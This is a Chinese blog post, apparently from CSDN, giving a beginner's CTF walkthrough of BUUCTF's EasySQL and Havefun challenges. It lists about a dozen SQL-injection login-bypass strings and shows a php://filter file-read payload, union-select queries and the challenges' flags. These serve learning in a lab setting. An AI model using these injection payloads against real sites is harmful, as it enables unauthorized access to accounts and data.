[极客大挑战 2019]Havefun1、EasySQL(BUUCTF)

最新推荐文章于 2025-06-02 05:24:29 发布
最新推荐文章于 2025-06-02 05:24:29 发布
阅读量2.3k 收藏 11
点赞数 5
CC 4.0 BY-SA版权
分类专栏: 网络攻防 网页 题解 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/HackerQY/article/details/128503805
本文介绍了如何解决SQL注入问题,通过实例展示了利用万能密码获取flag的过程,并解析了一道Web安全题目,讲解了通过分析PHP代码获取flag的方法。适合初学者了解SQL注入和Web安全基础知识。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言:

这篇文章还是是为了帮助一些

像我这样的菜鸟

找到简单的题解

今天是2022年的最后一天,

这一年我居然写了72篇文章

获得5枚勋章 

还多了14个粉丝

好了不说了,上水题的题解

EasySQL题目描述

解题工具:

不需什么工具,如题名easy sql

解题过程:

输入框都有了注入点就不用说了

先提交

admin 123456

看到提示密码错误

又看到url,就可以直接注入了

user 框里输入1'发现报错

那这题就很简单了

直接输入万能密码获得flag

这里普及一下万能密码

"or "a"="a
')or('a'='a
or 1=1--
'or 1=1--
a'or' 1=1--
"or 1=1--
'or'a'='a
"or"="a'='a
'or''='
1'or'='or'
1 or '1'='1'=1
1 or '1'='1' or 1=1
'OR 1=1%00

虽然有这么多种但目的都是一样的

注:万能密码中"#"是注释掉后半部分的意思

成功获得flag

flag{5a24fe63-f958-416b-898e-aa84b35a8469}

完成

Havefun题目描述

一只很可爱的猫

解题过程:

按下F12发现一段注释的PHP代码

$cat=$_GET['cat'];
echo $cat;
if($cat=='dog'){
      echo 'Syc{cat_cat_cat_cat}';
}

 逐行分析一下

第一行

$cat=$_GET['cat'];

意思是get一个变量名字为cat

第二行

echo $cat;

意思是显示cat

第三行

if($cat=='dog'){

意思是判断cat是否等于字符串'dog'

最后一行

echo 'Syc{cat_cat_cat_cat}';

显示一堆奇奇怪怪的东西

但应该就是flag(因为看见了"{ }")

分析到此解法就很明确了,

get一个cat变量让他等于'dog'即可获得flag

 

成功获得flag

flag{abbab8c1-d399-415b-8e08-34752ecfb468}

完成

 

[极客挑战 2019]Havefun
weixin_46962006的博客
12-09 569
                       [极客挑战 2019]Havefun 1 前言        个人观点,若有误请指教 解题思路及步骤 一打开靶场,只有一只猫在那里睡懒觉,直接查看源码,获得提示。 分析php代码 <?php //因为这个只是注释的提示,所以需自己尝试一下执行的效果(下面给出的是执行之后的结果,而不是提示代码应有的效果)! //如果有cat参数且不等于dog,则什么都不会输出 //如果有cat参数且等于dog,则输出Syc{cat_cat_cat
BUUCTF web 极客挑战 2019
菜的只能随便写写博客
04-01 1924
0x01 Secret File  在源码之中得到一个php页面  后面页面之中  根据提示抓包,在其中返回的页面得到了信息  得到源码,根据源码,发现存在文件包含漏洞  利用php伪协议,获取flag.php的信息,拿取flag payload: ?file=php://filter/read=convert.base64-encode/resource=flag.php EasyS...
[极客挑战 2019]Havefun1
明裕学长的博客
06-22 1341
1、打开题目 右键打开查看网页源码 我们仔细看这段代码我们可以尝试在网址后面加上?cat=dog 此时我们获得flag
BUUCTF[极客挑战 2019]Havefun 1题解
最新发布
2301_79896143的博客
06-02 474
这篇BUUCTF题解分析了一个名为"Havefun"的PHP代码审计题目。作者发现网页源码中隐藏了一段被注释的PHP代码,该代码会检查GET请求中的cat参数,当参数值为"dog"时输出flag。解题过程简单明了:通过在URL中添加?cat=dog参数成功获取到flag。文章指出这并非真实后端代码,而是解题提示,并强调这是一道基础的PHP代码审计题目。整个解题思路清晰,适合初学者理解基本的Web安全测试方法。
BUUCTF——[极客挑战 2019]Havefun 1
小白一枚多多关注的博客
03-17 8443
这道题是19年的极客挑战的题,这道题整体来说,额,很简单,而且这个猫猫感觉好乖哦~!好了,进入环境 进入环境后可以看见这个界面,啧,说实话感觉没啥用,因为什么有用的价值都没有,所以老规矩,看一下它的源代码 上面还有一堆的cs代码,所以我只截取了重要的部分,可以看见这里有几段被注释了的代码,那么现在我们就来进行简单的代码审计 好了,这道题就完成了,鹅鹅鹅,简单吧 ...
BUUCTF】[极客挑战 2019]Havefun 1
qq_45972928的博客
05-06 1848
主要考察对源代码的理解 1、进入网站 2、发现网页并没有什么有用的提示,观察源代码发现可能有用的判别语句 3、尝试输入?cat=dog
buuctf.web 1-32
m0_73889365的博客
02-17 950
buuctf web 刷题
BUUCTF - Web - 1
weixin_39505091的博客
07-20 849
堆叠注入是一种SQL注入技术,允许攻击者在单个SQL查询中执行多个语句。此时可以采用改表名的方式来查询,把words随便改成words1,然后把1919810931114514改成words,再把列名flag改成id,结合上面的1’ or 1=1#爆出表所有内容就可以查flag啦。查看另一个表的表结构,发现有 id 和 data 字段,猜想我们当前查询就是在这个表下进行的。发现过滤了很多字符,flag 字符串也被过滤了。其他命令的注入难免需要输入空格,需要尝试绕过空格。尝试注入,发现空格会被拦截,使用;
Buuctf Web题解
weixin_68029979的博客
04-24 2092
写在前面, 本人小白一枚,记录一下web做题过程,部分为个人理解可能有些地方写的不够明确还请见谅。当然由于刚入手web题,所以有些题会没有思路,这时会参考其他佬的题解过程。本文会一直更新,由于是第一次写博客,所以并不知道一篇能写多少,不管怎样会一直更新的。在题解中,可能并没有说清除为什么是这样,什么要这样,其实部分我也不知道是为什么,但就是这样做,由上所说我是个小白。如果在文中,出现了只有题目没有题解的情况,是因为我还没有学习与之相关的知识,所以先跳过了,但总会写的。
BUUCTF-Web题解(持续更新中)
2301_80281749的博客
11-25 2608
查询字段1’ union select 1,2,group_concat(id,username,password) from l0ve1ysq1#,就得到了flag:flag{5366f7aa-8040-44fc-bd88-bd0cfc671f3d}cat /flag进行查看flag文件,于是得到flag:flag{d81837e0-b908-4a0a-bac0-23ff569befe1}1,于是就得到了flag:flag{fac64f95-3877-4f3e-9772-47bb8585b31a}
buuctf [极客挑战 2019]Havefun1(新手向)
wwllzz683的博客
10-26 1375
除了用GET传入参数还可以用POST方法传入参数,这两者的区别就是:get直接在网页域名处输入(输入payload(攻击漏洞))。if($cat=='dog'):if是一个条件函数,你可以把他简单理解为如果,这段代码的意思就是如果cat=dog。echo ‘省略’:接着上文(如果cat=dog,就会输出一个东西,这个东西就是你需要的flag)注意:web题符号非常区分中英文输入法,如果你写了一长串的payload但是如果其中有一个符号是。回到题中,你已经清楚了什么GET传参直接在url输入:/?
极客挑战 2019]Havefun1
qq_41696518的博客
05-18 240
极客挑战 2019]Havefun1 进去之后只有一张猫图片,这类首先先F12查看源码,得到关键提示 明显提示cat=dog,所以网址加上后缀/?cat=dog 继而得到flag值
BUUCTF-[极客挑战 2019]Havefun1
Monica的博客
09-05 459
题目: 分析: 发现一个页面,除了一只猫外没有什么内容,查看源代码 在页面最后发现了一段被注释掉的代码: $cat=$_GET['cat']; echo $cat; if($cat=='dog'){ echo 'Syc{cat_cat_cat_cat}'; 意思是 get传入一个cat的值赋值给cat变量,然后输出这个cat变量的值。 然后如果cat变量的值等于dog就会输出Syc{cat_cat_cat_cat} 我们发现这个字符串的形式很想flag的形式。那么我们传入...
BUUCTF:[极客挑战 2019]Havefun
Starbright.的博客
10-29 1490
1.F12后将源码翻到底,发现GET; 2.传入?cat=dog; 3.获得flag。
[极客挑战 2019] Havefun
Sweet_vinegar520的博客
10-25 501
确实是 have fun,很简单的一种题,涉及知识点有:GET 传参、查看源代码、基础代码审计。
[极客挑战 2019]Havefun 1
tomatoff的博客
03-14 960
在URL后面加上?cat=dog,得到Flag
BUUCTF 之 [极客挑战 2019] Havefun(GET 传参)
两个月亮
12-29 2613
网站首页没有按钮,提示信息等等。遇到这种情况往往需要查看网页源代码或进行网站后台扫描。我们先来查看一下网页源代码(右键后点击。在地址栏中输入构造后的链接,敲击。启动靶机后,映入眼帘的是一只猫。这是一段 PHP 代码。即可获得 flag。
buuctf 极客挑战 2019]Havefun
01-14
极客挑战 2019中的Havefun题目属于Web安全类别。 #### 题目描述 该题目涉及PHP代码执行漏洞利用[^2]。通过分析给出的代码片段可以发现存在潜在的安全风险: ```php $cat = $_GET['cat']; echo $cat; if ($cat ==...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值